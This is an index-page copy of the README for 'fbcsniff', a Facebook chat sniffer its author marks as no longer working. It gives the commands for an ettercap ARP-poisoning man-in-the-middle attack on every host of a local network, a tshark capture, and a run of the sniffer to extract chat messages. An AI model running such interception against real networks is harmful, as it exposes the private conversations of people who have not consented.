Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/icholy/fbcsniff

facebook chat sniffer (obsolete)
https://github.com/icholy/fbcsniff

Last synced: 1 day ago
JSON representation

facebook chat sniffer (obsolete)

Awesome Lists containing this project

README

        

# FBCSNIFF: Facebook Chat Sniffer

> Extract facebook chat messages from a pcap file

## THIS DOES NOT WORK ANYMORE!

### Deps:

``` sh
$ sudo apt-get install python-dpkt
```

### Options:

```
usage: python fbcsniff.py [OPTIONS] -c

-c
-f (comma separated)
-s (use with -l)
-o
-l (keep looking for new messages)
-h (show this message)
```

### Usage Example:

I'm using ettercap and tshark

``` sh
$ sudo apt-get install ettercap tshark
```

Start a MITM attach using ettercap **(this will poison EVERYONE!)**:

``` sh
$ sudo ettercap -T -M arp -i // // -p auto_add
```

Start tshark capture:

``` sh
$ sudo -i
$ tshark -i -w /tmp/capture.pcap
```

Start pulling messages out of the capture file:

``` sh
$ sudo ./fbcsniff.py -l -c /tmp/capture.pcap
```